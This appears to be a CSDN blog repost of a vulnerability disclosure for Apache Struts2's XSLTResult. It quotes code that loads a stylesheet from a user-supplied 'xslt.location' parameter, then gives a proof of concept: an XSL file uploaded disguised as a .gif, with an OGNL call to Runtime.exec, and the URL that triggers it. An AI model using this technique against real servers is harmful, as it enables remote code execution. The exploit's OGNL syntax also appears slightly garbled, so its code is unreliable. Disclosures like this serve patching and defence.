关闭

struts2 xsltResult Local code execution vulnerability

标签: strutsstylesheettemplatesactionencodingxslt
793人阅读 评论(0) 收藏 举报

 

the file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>

An attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

open url

http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then struts2 will execute

ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)

 

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:5258225次
    • 积分:73917
    • 等级:
    • 排名:第21名
    • 原创:1392篇
    • 转载:2814篇
    • 译文:0篇
    • 评论:350条
    文章存档
    最新评论